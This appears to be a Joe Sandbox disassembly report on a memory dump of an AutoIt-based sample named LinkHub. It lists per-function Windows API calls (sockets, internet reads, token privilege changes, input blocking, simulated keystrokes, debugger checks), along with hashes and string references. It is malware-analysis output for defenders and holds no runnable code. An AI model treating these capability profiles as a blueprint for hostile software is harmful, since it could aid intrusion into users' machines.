Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 1dc79490df1fbe9e582e83d8e4bed5f7876e940b39a51ac14ceda4baf879b1d9
Instruction ID: 2368134a16e8bb90a003f91868bd8c87d9b9443c1bef1ce823d11e171d7315d8
Opcode Fuzzy Hash: 1dc79490df1fbe9e582e83d8e4bed5f7876e940b39a51ac14ceda4baf879b1d9
Instruction Fuzzy Hash: 3351C075A00200AFE710AF24C886F2A77A5EB45758F58848DF906AF393C671AD458BF1

Function 00E626DD Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00E6275C
IsWindowEnabled.USER32 ref: 00E6276A
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00E62777
IsIconic.USER32 ref: 00E62785
IsZoomed.USER32 ref: 00E62793

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: a2abe3870b4dd38226d1119be0c12290d6a20b8ebe65b20c4aa5804c9f857f3f
Instruction ID: 0b598c572437b173cb4a3b1f7b476a6415dcc531c68e86b9cb6e0680790c5bf4
Opcode Fuzzy Hash: a2abe3870b4dd38226d1119be0c12290d6a20b8ebe65b20c4aa5804c9f857f3f
Instruction Fuzzy Hash: AF210531B406008FD7109F26E844F5A7BE4EF94398B58906EE94AAB351CB71FC42CBA0

Function 00E4D889 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 00E4D8CE
GetLastError.KERNEL32(?,00000000), ref: 00E4D92F
SetEvent.KERNEL32(?,?,00000000), ref: 00E4D943

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: 2deeb7fabb62ba03a16e34bded115f896e707ff4aaf6cae3eb2fa4adad9df408
Instruction ID: 0c6e4912f39f14d37522982e588ac076d43bdbff9fa41325ba217881f7a9f483
Opcode Fuzzy Hash: 2deeb7fabb62ba03a16e34bded115f896e707ff4aaf6cae3eb2fa4adad9df408
Instruction Fuzzy Hash: FD219071A08705AFE7209F66EC44BAB77FCEB80358F10541EE646F2151D7B0EA048B60

Function 00E3E472 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00E146AC), ref: 00E3E482
GetFileAttributesW.KERNEL32(?), ref: 00E3E491
FindFirstFileW.KERNEL32(?,?), ref: 00E3E4A2
FindClose.KERNEL32(00000000), ref: 00E3E4AE

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 10b6f555757c21b057350a945e7b78b3b70e65a2f7dba0625aa02416d9a21d5d
Instruction ID: e05e3c69b3abd7ea77011bd842e5f2a25c834c2b6fb316fba981687926e17060
Opcode Fuzzy Hash: 10b6f555757c21b057350a945e7b78b3b70e65a2f7dba0625aa02416d9a21d5d
Instruction Fuzzy Hash: AFF0E5308189159BD210673CBC0D8AB7F6DAF0A339F904701F8B6E22F0D7B89D99C695

Function 00E2E5F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00E2E5F8

Strings

X64, xrefs: 00E2E680
%.3d, xrefs: 00E2E603

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: cbe4fd0c925dfce6492bb9ab969d5e6f67d402100a5695daa976e374d2a03998
Instruction ID: 9f168b3bd22806179cb9700c7b77d9a288719fe3bdab087e8bd8663093ea7865
Opcode Fuzzy Hash: cbe4fd0c925dfce6492bb9ab969d5e6f67d402100a5695daa976e374d2a03998
Instruction Fuzzy Hash: 33D012B1C08238DACB90E791AD48CF9737CAB18700F545452F906B1150EB24D9489731

Function 00E02992 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00E02A8A
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00E02A94
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00E02AA1

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 352df85162d3cd12ef15194896b5014b97cf10111df5aa8f15e78f1d4d0a2545
Instruction ID: 2dc277a501e57f4e1711a0e5801ad27a65fd8531c73d3427a8283211f6f52b45
Opcode Fuzzy Hash: 352df85162d3cd12ef15194896b5014b97cf10111df5aa8f15e78f1d4d0a2545
Instruction Fuzzy Hash: 5831D57490122C9BCB21DF68DD887DDBBB8AF08350F5081DAE90CA7261EB709F858F55

Function 00E32010 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00DF014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00DF09D8
Part of subcall function 00DF014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00DF09F5

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E3205A
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E32087
GetLastError.KERNEL32 ref: 00E32097

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 8160667eaeb8a1d3c0893577d1e62daf6bd62b01ffcf2f06454a93dc08c63178
Instruction ID: e73ea1e69932407eb40940d894dbcaf7213bc922c65a07878bfc292ac839cf65
Opcode Fuzzy Hash: 8160667eaeb8a1d3c0893577d1e62daf6bd62b01ffcf2f06454a93dc08c63178
Instruction Fuzzy Hash: 4D11BFB1904305AFD7289F54EC8AD6BBBB8EB04750F21841EE186A3251DB70BC45CA20

Function 00E3ECD0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00E3ED04

Strings

DOWN, xrefs: 00E3ECE9

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: mouse_event
String ID: DOWN
API String ID: 2434400541-711622031
Opcode ID: 6c4d4a9e1bb006ecbc026f6a4e02d1dacd329912c68fdc4aab9851b89bcc5aa0
Instruction ID: b2574dcb8cc651d875fe82bb06963cc7a9f76253520fece5e18c4cfdd1a82730
Opcode Fuzzy Hash: 6c4d4a9e1bb006ecbc026f6a4e02d1dacd329912c68fdc4aab9851b89bcc5aa0
Instruction Fuzzy Hash: C6E0862529D72578BD0421247C0AEF7474C8F12B38B516146FC00F41C0ED905C4291B4

Function 00E2E652 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00E2E664

Strings

X64, xrefs: 00E2E680

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: aea3912d9a126f3aa7120d45c000961fbed7e8763fe31dd83f12da71aaca9885
Instruction ID: 0a87a5f052169318dc9a414b0fd61711a4cd35ea1aec3b52b3cf9545888ef7d7
Opcode Fuzzy Hash: aea3912d9a126f3aa7120d45c000961fbed7e8763fe31dd83f12da71aaca9885
Instruction Fuzzy Hash: 4FD0C9B480512DEACB80DB50EC88DDA777CBB04304F100651F146B2140D77095488B20

Function 00E441FA Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00E552EE,?,?,00000035,?), ref: 00E44229
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00E552EE,?,?,00000035,?), ref: 00E44239

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 8c445a8f939fc7701889353fe7970754cb5b5871f74eedba7cc6a6bf12619272
Instruction ID: 8040114e5bd9067877cd26b6d653b5f309ad433fb21968d672c30fd991d1ee99
Opcode Fuzzy Hash: 8c445a8f939fc7701889353fe7970754cb5b5871f74eedba7cc6a6bf12619272
Instruction Fuzzy Hash: A0F0E5707042286AE72016B6AC4DFEB76ADEFC57B1F000176F505E22D1D9B09944C6B0

Function 00E3BBED Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00E3BC24
keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00E3BC37

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: ec33f72d9c74af909dfe9a33f550585588d1e6373900777e4c421ef708ceecda
Instruction ID: 7e2ab413f3da29f7869fe1867bfa4c3915821f9016758aa2d913de59a7a07538
Opcode Fuzzy Hash: ec33f72d9c74af909dfe9a33f550585588d1e6373900777e4c421ef708ceecda
Instruction Fuzzy Hash: 65F0497090424DABDB019FA1D809BAEBFB0EF04309F00900AF956A9192C7798605DF94

Function 00E31A0B Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E31B48), ref: 00E31A20
CloseHandle.KERNEL32(?,?,00E31B48), ref: 00E31A35

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 2dc3bce3da114f4935dc2f84ae765d6848a6a610a60e6f1cd7b7c3ce6435fb32
Instruction ID: bd27d0fe16679fbc2a50255021d9943b0c9f9d79b4d2d95ca22ad86309c18410
Opcode Fuzzy Hash: 2dc3bce3da114f4935dc2f84ae765d6848a6a610a60e6f1cd7b7c3ce6435fb32
Instruction Fuzzy Hash: 7DE04F72008614AFE7252B11FC09F737BE9EB04351F15881DF595D1471DBA26C90DB20

Function 00E4F4FF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00E4F51A

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 2e78f9b843d7a13194ea25794c7c8edae8688fff6aa07e8c19415c9f332c4fea
Instruction ID: c81d7285287686c0e2a372864c508b418dc2a56a31f227d3491894fb3a39dbd1
Opcode Fuzzy Hash: 2e78f9b843d7a13194ea25794c7c8edae8688fff6aa07e8c19415c9f332c4fea
Instruction Fuzzy Hash: 73E048316142055FC710AF6AE80499AF7DDEFA4761F008426F849D7351D674FD40CBB1

Function 00DF0D45 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,00DF075E), ref: 00DF0D4A

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 77abe2dd8e4dc657099e7dc3e008971d25e24bd2cbb902df3787e0caa9820870
Instruction ID: de620c08a77dfdd11d202f1f827d11719e1aa385a8cdbe4f604ab678850a0f7a
Opcode Fuzzy Hash: 77abe2dd8e4dc657099e7dc3e008971d25e24bd2cbb902df3787e0caa9820870
Instruction Fuzzy Hash:

Function 00E5353B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00E5358D
DeleteObject.GDI32(00000000), ref: 00E535A0
DestroyWindow.USER32 ref: 00E535AF
GetDesktopWindow.USER32 ref: 00E535CA
GetWindowRect.USER32(00000000), ref: 00E535D1
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00E53700
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00E5370E
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E53755
GetClientRect.USER32(00000000,?), ref: 00E53761
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00E5379D
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E537BF
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E537D2
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E537DD
GlobalLock.KERNEL32(00000000), ref: 00E537E6
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E537F5
GlobalUnlock.KERNEL32(00000000), ref: 00E537FE
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E53805
GlobalFree.KERNEL32(00000000), ref: 00E53810
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E53822
OleLoadPicture.OLEAUT32(?,00000000,00000000,00E70C04,00000000), ref: 00E53838
GlobalFree.KERNEL32(00000000), ref: 00E53848
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00E5386E
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00E5388D
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E538AF
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E53A9C

Strings

AutoIt v3, xrefs: 00E5374F
static, xrefs: 00E53797, 00E538EE
DISPLAY, xrefs: 00E538FF
, xrefs: 00E53A22

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: c4870c06993bc10326785451b46cc9d9f95321025eea1822dc612ea7efeb1e68
Instruction ID: 8271b9b6aee65343de4d1e09d1a50070b09f78df9aee45d15de54c56c833e200
Opcode Fuzzy Hash: c4870c06993bc10326785451b46cc9d9f95321025eea1822dc612ea7efeb1e68
Instruction Fuzzy Hash: F0027A71A00205AFDB14DF65DC89EAE7BB9EF49351F008519F915BB2A0CBB4AD09CF60

Function 00DD1625 Relevance: 53.0, APIs: 26, Strings: 4, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00DD16B4
SendMessageW.USER32(?,00001308,?,00000000), ref: 00E12B07
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00E12B40
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00E12F85

Part of subcall function 00DD1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00DD1488,?,00000000,?,?,?,?,00DD145A,00000000,?), ref: 00DD1865

SendMessageW.USER32(?,00001053), ref: 00E12FC1
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00E12FD8
ImageList_Destroy.COMCTL32(00000000,?), ref: 00E12FEE
ImageList_Destroy.COMCTL32(00000000,?), ref: 00E12FF9

Strings

(, xrefs: 00E12B86
0, xrefs: 00E12E11
(, xrefs: 00E12CA1
(, xrefs: 00E13035

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0$($($(
API String ID: 2760611726-1684351147
Opcode ID: 8bcd801d246ed5f00ebc0bf41c42a6d4c3d2c72a3ac173e1937b21a93e5a1a24
Instruction ID: 495af0efec5d04bbe5e89718e1c3b36adc120b5e9cf2c3790bcfaeeb55227f88
Opcode Fuzzy Hash: 8bcd801d246ed5f00ebc0bf41c42a6d4c3d2c72a3ac173e1937b21a93e5a1a24
Instruction Fuzzy Hash: 7C12BE34604201EFC725CF28DC44BAAB7E1FB49304F58556EF695BB261C731E89ACBA1

Function 00E5316E Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00E5319B
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00E532C7
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00E53306
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00E53316
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00E5335D
GetClientRect.USER32(00000000,?), ref: 00E53369
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00E533B2
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00E533C1
GetStockObject.GDI32(00000011), ref: 00E533D1
SelectObject.GDI32(00000000,00000000), ref: 00E533D5
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00E533E5
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E533EE
DeleteDC.GDI32(00000000), ref: 00E533F7
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00E53423
SendMessageW.USER32(00000030,00000000,00000001), ref: 00E5343A
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00E5347A
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00E5348E
